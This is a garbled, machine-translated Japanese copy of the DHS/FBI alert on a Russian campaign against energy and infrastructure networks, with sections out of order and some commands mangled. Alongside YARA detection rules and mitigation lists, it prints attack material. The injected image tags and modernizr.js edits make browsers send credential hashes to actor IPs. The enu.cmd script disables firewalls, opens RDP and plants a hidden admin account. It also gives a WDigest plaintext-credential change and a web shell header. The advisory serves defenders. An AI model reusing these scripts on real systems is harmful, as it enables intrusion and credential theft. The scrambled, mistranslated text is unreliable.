$ s17 = {2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B}
$ s18 = {6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B48214471D2}
$ s19 = {8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39}
$ s20 = {8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4}
$ s21 = {8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4}
$ s22 = "5.153.58.45"
$ s23 = "62.8.193.206"
$ s24 = "/ 1 / ree_stat / p"
$ s25 = "/icon.png"
$ s26 = "/ pshare1 / icon"
$ s27 = "/notepad.png"
$ s28 = "/pic.png"
$ s29 = "http://bit.ly/2m0x8IH"
調子:
($ s0および$ s1または$ s2)または($ s3または$ s4)または($ s5および$ s6または$ s7および$ s8および$ s9)または($ s10および$ s11)または($ s12および$ s13) )または($ s14)または($ s15)または($ s16)または($ s17)または($ s18)または($ s19)または($ s20)または($ s21)または($ s0および$ s22または$ s24)または($ s0と$ s22または$ s25)または($ s0と$ s23または$ s26)または($ s0と$ s22または$ s27)または($ s0と$ s23または$ s28) )
}
ルールAPT_malware_2
{
メタ:
description = "ルールがマルウェアを検出しました"
著者= "その他"
文字列:
$ api_hash = {8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED}
$ http_push = "Xモード:プッシュ" nocase
$ http_pop = "X-mode:pop" nocase
調子:
いずれか
}
ルールQuery_XML_Code_MAL_DOC_PT_2
{
メタ:
name = "Query_XML_Code_MAL_DOC_PT_2"
著者= "その他"
文字列:
$ zip_magic = {50 4b 03 04}
$ dir1 = "単語/ _rels / settings.xml.rels"
$ bytes = {8c 90 cd 4e eb 30 10 85 d7}
調子:
$ zip_magicは0、$ dir1と$ bytes
}
ルールQuery_Javascript_Decode_Function
{
メタ:
name = "Query_Javascript_Decode_Function"
著者= "その他"
文字列:
$ decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22 29 3B}
$ decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}
$ decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}
$ decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}
$ func_call = "a(\" "
調子:
ファイルサイズ<20KB、#func_call> 20、すべての($ decode *)
}
ルールQuery_XML_Code_MAL_DOC
{
メタ:
name = "Query_XML_Code_MAL_DOC"
著者= "その他"
文字列:
$ zip_magic = {50 4b 03 04}
$ dir = "word / _rels /" ascii
$ dir2 = "word / theme / theme1.xml" ascii
$ style = "word / styles.xml" ascii
調子:
0の$ zip_magicと0x0145の$ dir、0x02b7の$ dir2、0x08fdの$ style
}
ルールz_webshell
{
メタ:
description = "z_webshellの検出"
著者= "DHS NCCICハントと事故対応チーム"
日付= "2018/01/25"
md5 = "2C9095C965A55EFC46E16B86F9B7D6C6"
文字列:
$ aspx_identifier1 = "<%@" nocase asciiワイド
$ aspx_identifier2 = "<asp:" nocase ascii wide
$ script_import = /(import | assembly)名前(スペース)?\ = \ "(System | Microsoft)/ nocase ascii wide
$ case_string = / case \ "z_(dir | file | FM | sql)_ / nocase ascii wide
$ webshell_name = "公開ストリングz_progname =" nocase asciiワイド
$ webshell_password = "パブリック文字列パスワード=" nocase asciiワイド
調子:
1 of($ aspx_identifier *)
#script_import> 10
#case_string> 7
2つの($ webshell_ *)
ファイルサイズ<100KB
}
影響
この俳優のキャンペーンは、エネルギー、原子力、水、航空、建設、重要な製造業の複数の組織に影響を与えました。
溶液
DHSとFBIは、ネットワークユーザーと管理者に対し、以下の検出と防止のガイドラインを使用して、この活動を防御するよう奨励しています。
ネットワークとホストベースの署名
DHSとFBIは、ネットワーク管理者がIPアドレス、ドメイン名、ファイルハッシュ、およびYARAとSnortの署名を確認し、それらの監視リストにIPを追加して、組織内で悪意ある行為が発生しているかどうかを判断することを推奨します。ネットワーク境界ネットフローを確認することで、ネットワークが疑わしい活動を経験したかどうかを判断するのに役立ちます。ネットワークディフェンダーおよびマルウェアアナリストは、関連するYARAおよび.txtファイルに含まれるYARAおよびSnortシグネチャを使用して、悪意のあるアクティビティを特定する必要があります。
検出と予防措置
ユーザーと管理者は、IOCパッケージに記載されているすべてのIPアドレスとドメイン名を次の場所と比較することで、スピアフィッシング、水分補給穴、Webシェル、リモートアクセスアクティビティを検出できます。
ネットワーク侵入検知システム/ネットワーク侵入防御システムログ、
ウェブコンテンツログ、
プロキシサーバーログ、
ドメインネームサーバーの解決ログ、
パケットキャプチャ(PCAP)リポジトリ、
ファイアウォールログ、
ワークステーションのインターネット閲覧履歴ログ、
ホストベースの侵入検知システム/ホストベースの侵入防止システム(HIPS)ログ、
データ損失防止ログ、
交換サーバーログ、
ユーザーのメールボックス、
メールフィルタログ、
メールコンテンツログ、
AVメールログ、
OWAログ、
Blackberry Enterprise Serverログ、および
モバイルデバイス管理のログ
外部のサーバー上のWebシェルの存在を検出するには、IOCパッケージにリストされているIPアドレス、ファイル名、ファイルハッシュを以下の場所と比較します。
アプリケーションログ、
IIS / Apacheログ、
ファイルシステム、
侵入検知システム/侵入防止システムログ、
PCAPリポジトリ、
ファイアウォールログ、および
リバースプロキシ。
ワークステーションファイルシステムとネットワークベースのユーザーディレクトリを検索し、IOCパッケージにある添付ファイル名とハッシュを検索してスピアフィッシングを検出します。
すべての.lnkファイルのユーザープロファイルを含むファイル共有を検索することにより、VDI環境の永続性を検出します。
削除されたログを特定することによって、アクターによる回避技法を検出します。これは、最後に見たエントリを確認し、Windowsシステムログでイベント104を検索することで実行できます。
不正なアカウント、特に最近作成されたアカウントを識別するために、システム上のすべての管理者アカウントを確認して永続性を検出します。
すべてのユーザーのリモートアクセス可能なシステムのアクセス時間を確認することにより、正当な資格情報の悪意のある使用を検出します。異常なログイン時間は、アカウント所有者が確認する必要があります。
漏洩が疑われるユーザーの資格情報をすべてリモートデスクトップおよびVPNセッションで検証し、正当な資格情報の悪意のある使用を検出します。
OWAログでIOCパッケージにリストされているすべてのIPアドレスを検索して、スピアフィッシングを検出します。
メールサーバー、特に外部ユーザーアクセスを持つユーザーに対して作成された新しい電子メールアカウントをすべて検証することにより、ネットワーク経由のスピアフィッシングを検出します。
IOCパッケージにリストされているすべてのファイル名のシステムログを検索して、サーバー上の永続性を検出します。
PowerShellログでIOCパッケージに含まれる ".ps1"で終わるすべてのファイル名を検索して、横方向の移動と権限の昇格を検出します。(注:PowerShellのバージョン5が必要です。また、PowerShellのロギングはアクティビティの前に有効にする必要があります)。
重大なシステム上にインストールされているすべてのアプリケーションを不正なアプリケーション、特にFortiClient VPNとPython 2.7で確認して永続性を検出します。
レジストリの場所 "HKLM \ SOFTWARE \ Policies \ Microsoft \ Windows NT \ Terminal"で "REG_DWORD 100"の値を検索して永続性を検出します。Services \ MaxInstanceCount "と、" HKLM \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ policies \ system \ dontdisplaylastusername "の場所にある" REG_DWORD 1 "の値を指定します。
ドメイン名のないURIからのダウンロードをすべてのプロキシログで検索してインストールを検出します。
このキャンペーンに適用される一般的なベストプラクティス:
関連するUDPポート137を使用してTCPポート139および445をブロックすることにより、SMBおよび関連プロトコルのすべてのバージョンの外部通信を防止します。詳細については、NCCIC / US-CERTのSMBセキュリティベストプラクティスを参照してください。
ネットワーク上の境界ゲートウェイデバイスでWebベースの分散オーサリングとバージョン管理(WebDAV)プロトコルをブロックする。
異常なアクティビティ(オフタイムログイン、不正なIPアドレスログイン、複数の同時ログインなど)のVPNログを監視します。
ネットワーク上にWebフィルタと電子メールフィルタを展開します。既知の不良ドメイン名、送信元、およびアドレスをスキャンするようにこれらのデバイスを設定します。メッセージを受信してダウンロードする前にこれらをブロックします。このアクションは、ネットワークの最初の防衛レベルで攻撃面を減らすのに役立ちます。クラウドレピュテーションサービスを含む評判の高いウイルス対策ソリューションで、すべての電子メール、添付ファイル、およびダウンロード(ホストとメールゲートウェイの両方)をスキャンします。
業界のベストプラクティスに従って、ビジネスシステムおよびネットワークから重要なネットワークまたは制御システムをセグメント化します。
入口点と出口点で適切なロギングと可視性を確保する。
強化されたログが有効になっているPowerShellバージョン5の使用を確認してください。PowerShellの古いバージョンでは、攻撃者が実行した可能性のあるPowerShellコマンドの適切なログが提供されません。PowerShellモジュールのログ、スクリプトブロックのログ、および転写を有効にします。監視および分析のために、関連付けられたログを中央のログリポジトリに送信します。詳細については、FireEyeのブログ記事PowerShell Loggingによる可視性の向上を参照してください。
NCCIC / US-CERTアラート「TA15-314A - 侵害されたWebサーバーとWebシェル - 脅威の認識とガイダンス」に記載されている予防、検出、および緩和の戦略を実装します。
エンドユーザーに適切な電子メールとウェブの使用状況を知らせるトレーニングメカニズムを確立し、最新の情報と分析を強調表示し、フィッシングの一般的な指標を含めます。エンドユーザーは、珍しいメールや不審なメールを報告する方法について明確な指示が必要です。
アプリケーションディレクトリホワイトリストを実装する。システム管理者は、マイクロソフトのソフトウェア制限ポリシー、AppLocker、または同様のソフトウェアを通じて、アプリケーションまたはアプリケーションのディレクトリをホワイトリストに登録することができます。安全なデフォルトでは、PROGRAMFILES、PROGRAMFILES(X86)、SYSTEM32、およびICSソフトウェアフォルダからアプリケーションを実行できます。例外が認められない限り、他の場所はすべて許可しないでください。
例外が存在しない限り、信頼できない外部アドレスから発生したRDP接続をブロックする。妥当性について定期的に例外を審査します。
ミッションクリティカルなシステムのシステムログをセキュリティ情報イベント管理ツール内に少なくとも1年間保管します。
インシデント対応調査の適切な詳細レベルを記録するようにアプリケーションが設定されていることを確認します。
不正なコードの実行を防ぐためにHIPSやその他のコントロールを実装することを検討してください。
最小特権コントロールを確立する。
Active Directoryのドメインおよびエンタープライズ管理者アカウントの数を減らします。
疑わしい脅威のレベルに基づいて、すべてのローカルシステムとドメインシステムにわたってすべてのユーザー、管理者、およびサービスアカウントの資格情報をリセットします。
すべてのユーザーに複雑なパスワードを要求するパスワードポリシーを確立します。
ネットワーク管理のアカウントに外部接続がないことを確認します。
ネットワーク管理者が電子メールおよびインターネットアクセスに特権のないアカウントを使用していることを確認します。
すべての認証に二要素認証を使用し、外部に向いているインターフェイスや高リスク環境(リモートアクセス、特権アクセス、機密データへのアクセスなど)を特に重視します。
特権アカウントによって行われるアクティビティの記録と監査のプロセスを実装します。
権限エスカレーションとロール変更のログ記録とアラートを有効にします。
機密情報が開示されていないことを確認するために、公開可能な情報の検索を定期的に実施する。誤って含まれている可能性のある機密データの写真や文書を確認する。
アラートの記録を含め、ログをレビューするのに十分な人員を割り当てます。
完全な独立したセキュリティ(コンプライアンスではなく)リスクレビュー。
情報共有プログラムを作成し、参加する。
タイムリーなインシデント対応に役立つネットワークおよびシステムの文書を作成し、管理します。ドキュメンテーションには、ネットワーク図、資産所有者、資産の種類、インシデント対応計画が含まれている必要があります。
レポートの通知
DHSは、この文書で説明されている道具や技術の使用を特定した受領者に、直ちにDHSまたは法執行機関に情報を報告するよう奨励します。
インシデント対応リソースや技術支援を要請するには、NCCICcustomerservice@hq.dhs.gov (リンクは電子メール送信)または888-282-0870およびFBIに、現地の現地事務所またはFBIサイバー部門(CyWatch @ fbi。 gov (リンクは電子メールを送る)または855-292-3937)。
参考文献
[1]シマンテック。Dragonfly:洗練された攻撃グループをターゲットにした西洋のエネルギー部門。2017年9月6日(リンクは外部)
[2] CERT CC。脆弱性ノート#672268
[3] CCIRC CF17-010 UPDATE
[4] MIFR-10127623
リビジョン
2018年3月15日:初期バージョン
スタックスネットのような単一のトロイの木馬型マルウェアではなく、ほぼAIの挙動です。
これからのマルウェアやセキュリティ上の脅威は、サイバー・キル・チェーン・モデルで対処するしかありませんね。
影響を受けるシステム
ドメインコントローラ
ファイルサーバー
メールサーバー
概要
この合同テクニカルアラート(TA)は、国土安全保障省(DHS)と連邦捜査局(FBI)の間の分析的努力の結果です。このアラートでは、エネルギー、原子力、商業施設、水、航空、重要な製造業部門の組織だけでなく、米国政府機関を対象とするロシア政府の行動に関する情報を提供しています。また、妥協点(IOC)の指標と、被害ネットワークに侵入したロシア政府のサイバー犯罪者が使用する戦術、技術、手順(TTP)に関する技術的な詳細も含まれています。DHSとFBIは、ネットワーク警備員に悪意のある活動への暴露を特定し、軽減する能力を高めるよう、このアラートを発しました。
DHSとFBIは、小規模な商業施設のネットワークを標的としたロシア政府のサイバー犯罪者によるマルチステージ侵入キャンペーンとして、マルウェア対策、スピアフィッシング、エネルギー分野ネットワークへの遠隔アクセスを行ったこの活動を特徴づけている。アクセスを得た後、ロシアの政府のサイバー俳優は、ネットワーク偵察を行い、横方向に移動し、産業制御システム(ICS)に関する情報を収集した。
IOCパッケージおよび関連ファイルのダウンロード可能なコピーについては、以下を参照してください。
TA18-074A_TLP_WHITE.csv
TA18-074A_TLP_WHITE.stix.xml
MIFR-10127623_TLP_WHITE.pdf
MIFR-10127623_TLP_WHITE_stix.xml
MIFR-10128327_TLP_WHITE.pdf
MIFR-10128327_TLP_WHITE_stix.xml
MIFR-10128336_TLP_WHITE.pdf
MIFR-10128336_TLP_WHITE_stix.xml
MIFR-10128830_TLP_WHITE.pdf
MIFR-10128830_TLP_WHITE_stix.xml
MIFR-10128883_TLP_WHITE.pdf
MIFR-10128883_TLP_WHITE_stix.xml
MIFR-10135300_TLP_WHITE.pdf
MIFR-10135300_TLP_WHITE_stix.xml
直ちにDHSまたは法執行機関に連絡して、侵入を報告し、インシデント対応リソースまたは技術援助を要請する。
説明
2016年3月以降、ロシア政府のサイバー犯罪者(以下、「脅威俳優」と呼ぶ)は、エネルギー、原子力、商業施設、水道、航空宇宙、重要な製造業など、
DHSとFBIによる分析の結果、この活動に関連する明確な指標と行動が特定された。注目すべきは、2017年9月6日にシマンテックがリリースした洗練された攻撃グループを対象としたDragonfly:Western energy部門のレポートで、この進行中のキャンペーンに関する追加情報が記載されています。[1] (リンクは外部)
このキャンペーンには、ステージングと意図したターゲットという2つの異なるカテゴリの犠牲者が含まれています。最初の犠牲者は、このアラートを通じて「ステージングターゲット」と呼ばれる、セキュリティの弱いネットワークを持つ信頼できる第三者サプライヤなどの周辺組織です。脅威の俳優たちは、最終的に意図した犠牲者を標的とするときに、ステージング対象のネットワークをピボットポイントやマルウェアリポジトリとして使用しました。NCCICとFBIの判断では、俳優の究極の目的は組織ネットワークを妥協することであり、「意図した目標」とも呼ばれている。
技術的な詳細
このキャンペーンの脅威主体は、さまざまなTTPを使用しました。
スピアフィッシングメール(不正使用された正当なアカウントから)
水分補給ドメイン、
資格情報の収集、
オープンソースとネットワーク偵察、
ホストベースの搾取、および
産業制御システム(ICS)インフラを対象としています。
分析にサイバーキルチェインを使用する
DHSは、ロッキード・マーチン・サイバー・キル・チェーン・モデルを使用して、悪意のあるサイバー活動を分析し、議論し、解剖しました。このモデルの段階には、偵察、武器化、配達、搾取、設置、指揮統制、目的に関する行動などが含まれます。このセクションでは、このフレームワーク内の脅威アクターの活動の概要を説明します。
ステージ1:偵察
脅威主体は、機会のターゲットとして追求するのではなく、意図した組織を意図的に選択したように見えます。ステージングターゲットは、多くの意図されたターゲットと既存の関係を保持していました。DHS分析では、脅威アクターが、偵察段階で組織監視ネットワークが主催する公開情報にアクセスすることが確認されました。フォレンジック分析に基づいて、DHSは脅威の俳優が組織内のネットワークおよび組織設計および制御システム機能に関する情報を求めたことを評価します。これらの手法は、対象となる槍フィッシングの試みに必要な情報を収集するために一般的に使用されます。場合によっては、会社のウェブサイトに投稿された情報、特に無害である可能性がある情報には、機密情報が含まれている場合があります。一例として、脅威の俳優は、公にアクセス可能な人事ページから小さな写真をダウンロードしました。拡張された画像は、制御システムの機器モデルとステータス情報をバックグラウンドで表示する高解像度の写真でした。
また分析では、脅威の俳優たちは、いくつかの意図されたターゲットのウェブサイトのソースコードをダウンロードするために妥協したステージングターゲットを使用したことも明らかにしました。さらに、脅威アクターは、企業のWebベースの電子メールや仮想プライベートネットワーク(VPN)接続などのインフラストラクチャにリモートからアクセスしようとしました。
Sの田下2:兵器
スピアフィッシングEメールTTP
スピアフィッシングキャンペーンでは、電子メール添付ファイルを使用して、正当なMicrosoft Office機能を活用して、サーバーメッセージブロック(SMB)プロトコルを使用してリモートサーバーからドキュメントを取得しました。(この要求の例はfile [:] // <リモートIPアドレス> /Normal.dotmです)。Microsoft Wordによって実行される標準プロセスの一部として、この要求はサーバーでクライアントを認証し、要求されたファイルを取得する前にユーザーの資格情報ハッシュをリモートサーバーに送信します。(注:ファイルが取得されなくても資格情報の転送が行われる可能性があります)。資格情報ハッシュを取得した後、脅威アクターはパスワードクラッキング技術を使用して平文パスワードを取得できます。有効な資格情報を使用すると、脅威アクターは、単一要素認証を使用する環境で許可されたユーザーになりすますことができます。[2]
水穴地域の利用
脅威俳優の目標を立てるための主な用途の1つは、雨水穴を開けることでした。脅威主体は、信頼できる組織のインフラストラクチャを傷つけ、意図した目標を達成しました。[3]既知の給水口のおよそ半分は、プロセス制御、ICS、または重要インフラに関連する商業出版物および情報ウェブサイトである。これらの水穴は評判の良い組織によって開発された正当なコンテンツをホストしているかもしれませんが、脅威アクターはウェブサイトを改変して悪意のあるコンテンツを含むようにしました。脅威の俳優は、ウェブサイトのコンテンツにアクセスしてそれを直接変更するために合法的な資格情報を使用しました。脅威アクターは、脅威アクターによって制御されるIPアドレスからSMBを使用してファイルアイコンを要求するようにJavaScriptおよびPHPファイルを変更することにより、これらのWebサイトを修正しました。この要求は、資格取得のために槍フィッシング詐欺の文書で観察された同様の技術を達成する。あるケースでは、脅威アクターは、リダイレクトされたトラフィックを実行した正当なPHPファイル "header.php"にコード行を追加しました。
<img src = "file [:] // 62.8.193 [。] 206 / main_logo.png" style = "height:1px; width:1px;" />
別の例では、脅威の俳優は、ユーザーのブラウザのさまざまな側面を検出するためにウェブサイトが使用する正当なJavaScriptライブラリである "modernizr.js"というJavaScriptファイルを変更しました。ファイルは以下の内容を含むように変更されました:
var i = document.createElement( "img");
i.src = "file [:] // 184.154.150 [。] 66 / ame_icon.png";
i.width = 3;
i.height = 2;
ステージ3:配達
ステージング対象のネットワークを脅かすと、脅威主体は以前に報告されたTTPとは異なるスピアフィッシング電子メールを使用しました。スピアフィッシングの電子メールは、総称契約約款(件名は「AGREEMENT&Confidential」)を使用し、「document.pdf」という一般的なPDF文書が含まれていました。(添付ファイル名の冒頭に2つの単一のバックティックを含めることに注意してください)。PDFは悪意のあるコードではなく、アクティブなコードを含んでいませんでした。この文書には短縮URLが含まれていたため、クリックすると、ユーザーに電子メールアドレスとパスワードの入力を求めるWebサイトが表示されました。(注:PDF内のコードはダウンロードを開始しませんでした。)
以前の報告では、DHSとFBIは、これらのスピアフィッシング電子メールのすべてが制御システムまたはプロセス制御システムに言及していることに気づいた。脅威の俳優たちは、意図した標的組織に対してこれらのテーマを特に使用し続けました。電子メールメッセージには、一般的な産業用制御装置およびプロトコルへの参照が含まれていました。この電子メールは、産業制御システム担当者の正式な履歴書またはCV(カリキュラムビタ)と思われる悪意のあるMicrosoft Word添付ファイル、およびユーザーに添付ファイルを開くよう促す招待状とポリシー文書を使用していました。
ステージ4:搾取
脅威の俳優たちは、フィッシング詐欺行為において、ステージング対象に向けられた、独特で珍しいTTPを使用しました。http:// imageliners [。] comの最終的な宛先にリダイレクトされたhttp:// tinyurl [。] com / h3sdqckリンクにリダイレクトされたhttp:// bit [。] ly / 2m0x8IHリンクへの連続的なリダイレクト/ nitel。imagelinerウェブサイトには、ウェブサイトのログインページを模倣する電子メールアドレスとパスワードの入力フィールドが含まれていました。
意図したターゲットを悪用すると、脅威アクターは悪意のある.docxファイルを使用してユーザーの資格情報を取得しました。ドキュメントは、TCP(Transmission Control Protocol)ポート445または139を使用して、SMB上の "file://"接続を介してファイルを取得しました。この接続は、コマンドおよび制御(C2)サーバー(脅威アクターが所有するサーバーまたは被害者のものです。ユーザーがドメインの認証を試みると、C2サーバーにパスワードのハッシュが提供されました。ローカルユーザは、ユーザ名とパスワードを入力するグラフィカルユーザインタフェース(GUI)プロンプトを受信し、C2はTCPポート445または139を介してこの情報を受信しました(注:信用情報の損失にはファイル転送は必要ありません)。この行動をこのキャンペーンのDragonflyの脅威の俳優に関連付けます。[1] (リンクは外部)
ステージ5:インストール
脅威アクターは、妥協した資格情報を利用して、マルチファクタ認証が使用されていない犠牲者のネットワークにアクセスしました。[4]永続性を維持するために、脅威アクターは、ステージング対象内にローカル管理者アカウントを作成し、意図したターゲット内に悪意のあるファイルを配置しました。
ローカルアカウントの確立
脅威の俳優たちは、正規のバックアップアカウントに偽装されたローカル管理者アカウントを作成するためにスクリプトを使用しました。最初のスクリプト "symantec_help.jsp"には、ローカル管理者アカウントを作成し、リモートアクセス用のファイアウォールを操作するために設計された悪質なスクリプトへの1行の参照が含まれていました。このスクリプトは "C:¥Program Files(x86)¥Symantec¥Symantec Endpoint Protection Manager¥tomcat¥webapps¥ROOT¥"にあります。
symantec_help.jspの内容
____________________________________________________________________________________________
<%Runtime.getRuntime()。exec( "cmd / C \" "+ System.getProperty(" user.dir ")+" \\ .. \\ webapps \\ ROOT \\ <enu.cmd> \ "" ); %>
____________________________________________________________________________________________
スクリプト "enu.cmd"は、管理者アカウントを作成し、ホストベースのファイアウォールを無効にし、リモートデスクトッププロトコル(RDP)アクセス用にグローバルにポート3389を開きました。スクリプトは次に、新しく作成したアカウントを管理者グループに追加して昇格された権限を取得しようとしました。このスクリプトには、スペイン語、イタリア語、ドイツ語、フランス語、および英語のグループ名 "administrator"のハードコード値が含まれていました。
enu.cmdの内容
____________________________________________________________________________________________
netshファイアウォールがopmodeを無効にする
netsh advfirewallはすべてのプロファイルをオフに設定します
TCP / t REG_SZ / d "3389:TCP:*:Enabled:リモートデスクトップ" / f:リモートデスクトップ "/ f。
TCP / t REG_SZ / d "3389:TCP:*:Enabled:リモートデスクトップ" / f:リモートデスクトップ "/ f。
reg "HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / fを追加します
reg "HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server" / v fSingleSessionPerUser / t REG_DWORD / d 0 / fを追加します
reg "HKLM¥SYSTEM¥CurrentControlSet¥Control¥Terminal Server¥Licensing Core" / v EnableConcurrentSessions / t REG_DWORD / d 1 / fを追加します
regを "HKLM¥SOFTWARE¥Microsoft¥Windows NT¥CurrentVersion¥Winlogon"に追加します。/ v EnableConcurrentSessions / t REG_DWORD / d 1 / f
regは「HKLM¥SOFTWARE¥Microsoft¥Windows NT¥CurrentVersion¥Winlogon」を追加します。/ v AllowMultipleTSSessions / t REG_DWORD / d 1 / f
"HKLM \ SOFTWARE \ Policies \ Microsoft \ Windows NT \ Terminal Services" / v MaxInstanceCount / t REG_DWORD / d 100 / fを追加します。
ネットユーザーMS_BACKUP <Redacted_Password> / add
net localgroup管理者/ MS_BACKUPを追加する
net localgroup管理/追加MS_BACKUP
net localgroup Amministratori / MS_BACKUPを追加します。
net localgroup管理/追加MS_BACKUP
net localgroup Administrateurs / MS_BACKUPを追加する
net localgroup "リモートデスクトップユーザー" / MS_BACKUPを追加する
ネットユーザーMS_BACKUP / expires:never
regは「HKLM¥SOFTWARE¥Microsoft¥Windows NT¥CurrentVersion¥Winlogon¥SpecialAccounts¥UserList」を追加します。/ v MS_BACKUP / t REG_DWORD / d 0 / f
regは、HKLM¥SOFTWARE¥Microsoft¥Windows¥CurrentVersion¥policies¥system / v dontdisplaylastusername / t REG_DWORD / d 1 / fを追加します。
regを追加します。HKLM¥SOFTWARE¥Microsoft¥Windows¥CurrentVersion¥policies¥system / v LocalAccountTokenFilterPolicy / t REG_DWORD / d 1 / f
sc config termservice start = auto
ネット開始用語サービス
____________________________________________________________________________________________
DHSは、脅威の俳優が、このようなスクリプトを使用して、ステージング対象のネットワーク内に複数のアカウントを作成することを観察しました。脅威俳優によって作成された各アカウントは、その運用において特定の目的を果たしました。これらの目的は、追加のアカウントの作成からアクティビティのクリーンアップまでの範囲でした。DHSとFBIは、これらのローカル口座を作成した後、以下の行動を観察した。
アカウント1:アカウント1は、ステージング対象のバックアップサービスを模倣するように名前が付けられました。このアカウントは、前述の悪質なスクリプトによって作成されました。脅威俳優は、このアカウントを使用してオープンソースの偵察を行い、意図した目標に遠隔からアクセスしました。
アカウント2:アカウント1を使用してアカウント2を作成し、電子メール管理アカウントを偽装しました。観察された唯一のアクションは、アカウント3を作成することでした。
アカウント3:ステージング対象のMicrosoft Exchange Server内にアカウント3が作成されました。PowerShellスクリプトは、脅威アクターがアカウント2として認証されている間に、RDPセッション中にこのアカウントを作成しました。作成されたMicrosoft Exchangeアカウントの命名規則に続いてステージングターゲット(たとえば、姓と最初に連結した最初のイニシャル)が続きました。
アカウント4:妥協の後半に、脅威アクターはアカウント1を使用してローカル管理者アカウントであるアカウント4を作成しました。次に、アカウント4を使用してログを削除し、トラックをカバーしました。
スケジュールされたタスク
さらに、脅威アクターは、8時間ごとに新しく作成されたアカウントから自動的にログアウトするように設計されたresetというスケジュールされたタスクを作成しました。
VPNソフトウェア
ステージングターゲットへのアクセスを達成した後、脅威アクターは、意図した犠牲者に対して操作を実行するツールをインストールしました。ある時に、脅威の俳優たちは、意図したターゲットネットワークに接続するためのVPNクライアントとしておそらく使用されていたFortiClientの無料版をインストールしました。
パスワードクラッキングツール
脅威の俳優たちは、信任状収穫の目標と一致して、Hydra、SecretsDump、CrackMapExecなどのオープンソースとフリーツールを削除して実行しました。命名規則とダウンロード場所は、これらのファイルがGitHubのような公に利用可能な場所から直接ダウンロードされたことを示唆しています。フォレンジック分析は、これらのツールの多くが、アクターがシステムにアクセスしていた期間に実行されたことを示しています。注目すべきは、脅威の俳優たちがPython 2.7を犠牲にした病院のホストにインストールしたことと、C:\ Users \ <Redacted Username> \ Desktop \ OWAExchange \にPythonスクリプトがあることです。
ダウンローダ
意図したターゲットのネットワークの内部に入ると、脅威アクターはリモートサーバーからツールをダウンロードしました。ファイル名の最初のバージョンは.txt拡張子を含み、適切な拡張子(通常は.exeまたは.zip)に名前が変更されました。
一例では、意図した犠牲者のネットワークへの遠隔アクセスを得た後、脅威アクターは以下のアクションを実行した:
脅威アクターは91.183.104 [。] 150に接続し、複数のファイル、特にファイルINST.txtをダウンロードしました。
ファイルは新しい拡張子に名前が変更され、INST.txtの名前はINST.exeに変更されました。
ファイルはホスト上で実行され、すぐに削除されました。
INST.exeを実行すると、ntdll.exeがダウンロードされ、ntdll.exeが意図したターゲットの侵害されたシステムの実行プロセスリストに表示されました。
レジストリ値 "ntdll"が "HKEY_USERS \ <USER SID> \ Software \ Microsoft \ Windows \ CurrentVersion \ Run"キーに追加されました。
.LNKファイル操作による永続性
脅威の俳優は、一般にMicrosoft Windowのショートカットファイルと呼ばれるLNKファイルを操作して、ユーザーの資格情報を繰り返し収集しました。デフォルトのWindows機能により、ローカルまたはリモートのWindowsリポジトリからアイコンをロードできます。脅威アクターは、アイコンのパスをアクターがリモートサーバーコントローラーに設定することで、この組み込みのWindows機能を悪用しました。ユーザーがディレクトリを参照すると、Windowsはアイコンを読み込み、SMB認証セッションを開始しようとします。このプロセス中、アクティブなユーザーの資格情報は、試行されたSMB接続を介して渡されます。
観察されたLNKファイルのうち4つは、 "SETROUTE.lnk"、 "notepad.exe.lnk"、 "Document.lnk"および "desktop.ini.lnk"でした。これらの名前は文脈的であるように見え、脅威の俳優はこの戦術を使用している間に様々なファイル名を使用することがあります。これらのLNKファイルのアイコンパスで観察された2つのリモートサーバーは、62.8.193 [206]と5.153.58 [。] 45でした。以下は、LNKファイルの1つの解析された内容です:
LNKファイルの1つの解析された内容
ファイルの解析出力:desktop.ini.lnk
レジストリの変更
脅威アクターは、キーシステムを変更して、プレーンテキストのクレデンシャルをメモリに格納します。ある例では、脅威アクターは次のコマンドを実行しました。
reg "HKLM \ SYSTEM \ CurrentControlSet \ Control \ SecurityProviders \ WDigest" / v UseLogonCredential / t REG_DWORD / d 1 / fを追加します
ステージ6:コマンドとコントロール
脅威の俳優は、一般に、意図したターゲットの公開アクセス可能な電子メールおよびWebサーバー上にWebシェルを作成しました。脅威の俳優は、2つの異なるウェブシェルに対して3つの異なるファイル名( "global.aspx、autodiscover.aspx、index.aspx)を使用しました。2つのグループの違いは、「パブリックストリングパスワード」フィールドでした。
Webシェルの初めの内容
____________________________________________________________________________________________
<%@ Page Language = "C#" Debug = "true" trace = "false" validateRequest = "false" EnableViewStateMac = "false" EnableViewState = "true"%>
<%@ import Namespace = "System"%>
<%@ import Namespace = "System.IO"%>
